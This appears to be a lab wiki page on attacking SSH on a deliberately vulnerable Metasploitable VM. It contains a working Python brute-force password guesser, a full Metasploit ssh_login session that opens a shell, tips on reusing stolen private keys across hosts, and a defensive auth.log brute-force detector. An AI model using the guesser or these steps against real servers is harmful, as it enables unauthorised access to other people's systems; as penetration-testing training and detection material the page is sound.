Metasploitable/SSH/Exploits
From charlesreid1
Revision as of 17:33, 26 March 2016
SSH Service Info
First, a reminder of the information nmap returned about the SSH service after a port scan:
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

This server offers only SSH protocol 2.0, not protocol 1, which is hopelessly broken and easy to defeat. That means getting past SSH will be (at least) mildly challenging: there is no cheap protocol-level shortcut, so the way in is the credentials or the keys. Two details in the banner are still worth noting before you start guessing. "OpenSSH 4.7p1 Debian 8ubuntu1" identifies a 2008-era Ubuntu build, and a modern OpenSSH client may refuse the host-key algorithms such an old sshd offers (the symptom is "no matching host key type found"); if that happens, re-enable them for the session with -oHostKeyAlgorithms=+ssh-rsa, and -oPubkeyAcceptedAlgorithms=+ssh-rsa when authenticating with a key. The fingerprints above are also what you compare against later if you recover the host's private keys.
Links with Background Info
Here is some good background info on two SSH attacks: https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/
The first attack is ssh_login, which uses Metasploit to brute-force guess SSH login credentials.
- Module name is auxiliary/scanner/ssh/ssh_login
The second attack requires a private key. If you gain access to a private SSH key on one machine, you can attempt to authenticate to a large number of hosts and services with that key; keys copied between boxes or shared by an admin frequently work on more than the machine they were taken from.
- Module name is auxiliary/scanner/ssh/ssh_login_pubkey
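As an added example (mine, not code from this page or from the Metasploit project), here is a small Python password guesser built around the same options ssh_login exposes, so the credential-building rules those options imply can be seen and run offline. It assumes paramiko is installed for the real SSH attempt (that import is deferred until the function is called); the wordlists and the stand-in target are constructed; and the ordering and de-duplication rules are this example's choices, not a statement about how the module itself is implemented.

```python
"""Added example (not from this page or from Metasploit): a small ssh_login-
style password guesser.  It reproduces the credential-building semantics
implied by the module options listed on this page (USERNAME/PASSWORD,
USER_FILE/PASS_FILE, USERPASS_FILE, BLANK_PASSWORDS, STOP_ON_SUCCESS) and
drives them through an injected login callback so the logic runs offline.
The real SSH attempt uses paramiko (assumed installed) and imports it only
when that function is called.  Ordering and de-duplication are this
example's choices, not a description of the module's internals."""
from typing import Callable, Iterable, List, Optional, Tuple

Cred = Tuple[str, str]
LoginFn = Callable[[str, int, str, str], bool]


def wordlist_lines(text: str) -> List[str]:
    """Non-empty, stripped lines of a wordlist; '#' lines are treated as comments."""
    return [s for s in (raw.strip() for raw in text.splitlines())
            if s and not s.startswith("#")]


def build_candidates(username: Optional[str] = None,
                     password: Optional[str] = None,
                     user_file: str = "",
                     pass_file: str = "",
                     userpass_file: str = "",
                     blank_passwords: bool = True) -> List[Cred]:
    """Turn the option sources into one ordered, de-duplicated list of pairs.

    USERPASS_FILE lines are explicit "user password" pairs and are tried as
    given; USERNAME/USER_FILE are crossed with PASSWORD/PASS_FILE; with
    BLANK_PASSWORDS every user seen also gets an empty password.
    """
    users = ([username] if username else []) + wordlist_lines(user_file)
    passwords = ([password] if password is not None else []) + wordlist_lines(pass_file)

    cands: List[Cred] = []
    for line in wordlist_lines(userpass_file):
        user, _, pw = line.partition(" ")        # "user password", space separated
        cands.append((user, pw.strip()))
    cands += [(u, p) for u in users for p in passwords]
    if blank_passwords:
        every_user = dict.fromkeys([u for u, _ in cands] + users)  # ordered set
        cands += [(u, "") for u in every_user]
    return list(dict.fromkeys(cands))            # drop repeats, keep first-seen order


def brute_force(host: str, port: int, cands: Iterable[Cred],
                try_login: LoginFn, stop_on_success: bool = False) -> List[Cred]:
    """Try every candidate against host:port and return the pairs that worked.

    stop_on_success=True mirrors STOP_ON_SUCCESS: quit after the first hit on
    this host.  Leaving it False finds additional accounts at the cost of more
    attempts (and more log lines on the target).
    """
    found: List[Cred] = []
    for user, pw in cands:
        if try_login(host, port, user, pw):
            found.append((user, pw))
            if stop_on_success:
                break
    return found


def ssh_try_login(host: str, port: int, user: str, pw: str,
                  timeout: float = 5.0) -> bool:
    """One real password attempt.  paramiko is a third-party dependency (assumption).

    Only a rejected password returns False; network and protocol errors
    propagate so the operator sees a dead host instead of a silent miss.
    """
    import paramiko  # imported here so the rest of the file runs without it
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, port=port, username=user, password=pw,
                       timeout=timeout, banner_timeout=timeout, auth_timeout=timeout,
                       allow_agent=False, look_for_keys=False)
        return True
    except paramiko.AuthenticationException:
        return False
    finally:
        client.close()


# Constructed wordlists standing in for root_userpass.txt and friends.
SAMPLE_USERPASS = "# user password\nroot root\nroot toor\nmsfadmin msfadmin\n"
SAMPLE_USERS = "service\nuser\n"
SAMPLE_PASSWORDS = "password\n"

# Constructed stand-in for the target: only msfadmin:msfadmin is valid, as on
# Metasploitable.  Pass ssh_try_login instead of fake_login to hit a real host.
VALID_ON_TARGET = {("msfadmin", "msfadmin")}


def fake_login(host: str, port: int, user: str, pw: str) -> bool:
    return (user, pw) in VALID_ON_TARGET


if __name__ == "__main__":
    cands = build_candidates(user_file=SAMPLE_USERS, pass_file=SAMPLE_PASSWORDS,
                             userpass_file=SAMPLE_USERPASS)
    print(f"{len(cands)} candidate pairs")
    print(brute_force("10.0.0.27", 22, cands, fake_login, stop_on_success=True))
```

The point of separating build_candidates from brute_force is the same one the module's options make: a USERPASS_FILE is a short list of known-good pairs (root root, msfadmin msfadmin, ...), while USER_FILE and PASS_FILE multiply into a cross product, so the choice of file decides how many attempts, and how many failed-login records on the target, a run produces.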
Brute Force ssh_login
We already covered how to brute force the login with Hydra on Metasploitable/SSH/Brute Force.
Did you know you can also brute force an SSH login with Metasploit? Use the auxiliary/scanner/ssh/ssh_login module.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

Set the target and a wordlist for the Metasploitable virtual machine. USERPASS_FILE takes "user password" pairs, one per line, so the run tries exactly the listed pairs rather than the USER_FILE x PASS_FILE cross product; BLANK_PASSWORDS (on by default) adds an empty password for each user, and STOP_ON_SUCCESS can be set to true if one working account per host is enough:

msf auxiliary(ssh_login) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf auxiliary(ssh_login) > set VERBOSE false
VERBOSE => false
Now run the attack:
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 - SSH - Starting buteforce
[*] Command shell session 1 opened (?? -> ??) at 2016-03-26 17:25:18 -0600
[+] 10.0.0.27:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux
exit
[*] Command shell session 1 closed.
msf auxiliary(ssh_login) >

The module opened a command shell session for the working pair, msfadmin:msfadmin (the default account Metasploitable ships with), and sessions -i 1 drops straight onto the target as that user. Note 112(admin) in the id output: on Ubuntu releases of this era the admin group is the sudo group, so this shell is one sudo away from root. With the Metasploit database connected, the pair is also stored and can be listed afterwards with creds.
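As an added example, not part of the original page, here is the other side of that run: the sshd lines a brute force like this writes to the target's /var/log/auth.log, and a small Python detector for the pattern, a burst of failed logins from one source followed by an Accepted login from the same source. The log lines are constructed to follow the OpenSSH syslog format Ubuntu uses; the attacker address 10.0.0.5, the second host 10.0.0.9, the PIDs, ports and timestamps are made up.

```python
"""Added example (not from this page): what the ssh_login run above leaves in
the target's /var/log/auth.log, and a small detector for it.  The log lines
are constructed to follow the OpenSSH-via-syslog format Ubuntu uses; the
attacker address 10.0.0.5, PIDs, ports and timestamps are made up.  The
detector raises one alert when a source piles up failures inside a time
window and another when a success follows those failures, which is the
signature of a brute force that worked."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional

# Constructed sample: a burst of guesses, the msfadmin:msfadmin hit, then
# unrelated traffic from another host that should not alert.
SAMPLE_AUTH_LOG = """\
Mar 26 17:25:10 metasploitable sshd[4531]: Failed password for root from 10.0.0.5 port 49152 ssh2
Mar 26 17:25:11 metasploitable sshd[4533]: Failed password for root from 10.0.0.5 port 49153 ssh2
Mar 26 17:25:12 metasploitable sshd[4535]: Failed password for invalid user admin from 10.0.0.5 port 49154 ssh2
Mar 26 17:25:13 metasploitable sshd[4537]: Failed password for invalid user user from 10.0.0.5 port 49155 ssh2
Mar 26 17:25:14 metasploitable sshd[4539]: Failed password for msfadmin from 10.0.0.5 port 49156 ssh2
Mar 26 17:25:18 metasploitable sshd[4541]: Accepted password for msfadmin from 10.0.0.5 port 49157 ssh2
Mar 26 17:25:18 metasploitable sshd[4541]: pam_unix(sshd:session): session opened for user msfadmin by (uid=0)
Mar 26 17:40:02 metasploitable sshd[4602]: Accepted publickey for msfadmin from 10.0.0.9 port 50210 ssh2
Mar 26 17:41:15 metasploitable sshd[4610]: Failed password for msfadmin from 10.0.0.9 port 50211 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+ ssh2"
)


def parse_line(line: str, year: int = 2016) -> Optional[dict]:
    """Parse one sshd auth line; syslog omits the year, so the caller supplies it."""
    m = LINE_RE.match(line)
    if not m:
        return None  # pam_unix session lines, sudo, cron etc. are ignored
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "ok": m["result"] == "Accepted", "method": m["method"],
            "user": m["user"], "src": m["src"]}


def detect(log_text: str, threshold: int = 5, window_s: int = 60) -> List[str]:
    """Sliding-window failure counter keyed by source address.

    BRUTE_FORCE fires once per source when failures inside the window reach
    `threshold`; SUCCESS_AFTER_FAILURES fires when a login succeeds while that
    source still has failures inside the window.
    """
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    flagged = set()
    alerts: List[str] = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        src, q = ev["src"], recent[ev["src"]]
        while q and (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()  # expire failures that fell out of the window
        if not ev["ok"]:
            q.append(ev["ts"])
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(f"BRUTE_FORCE {src}: {len(q)} failed logins within {window_s}s")
        elif q:
            alerts.append(f"SUCCESS_AFTER_FAILURES {src}: {ev['method']} login as "
                          f"{ev['user']} after {len(q)} recent failures")
            q.clear()  # later logins from this source start from a clean count
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_AUTH_LOG):
        print(alert)
```

Key on the source address rather than the sshd PID: sshd allows several password attempts per connection by default (MaxAuthTries is 6), so a slow run at a low BRUTEFORCE_SPEED can put several failures under one PID while a fast one spreads them across connections, and a sliding window over the source catches both. Setting VERBOSE false on the attacker side only hides the failed attempts from the msfconsole output; every one of them still lands in this log on the target.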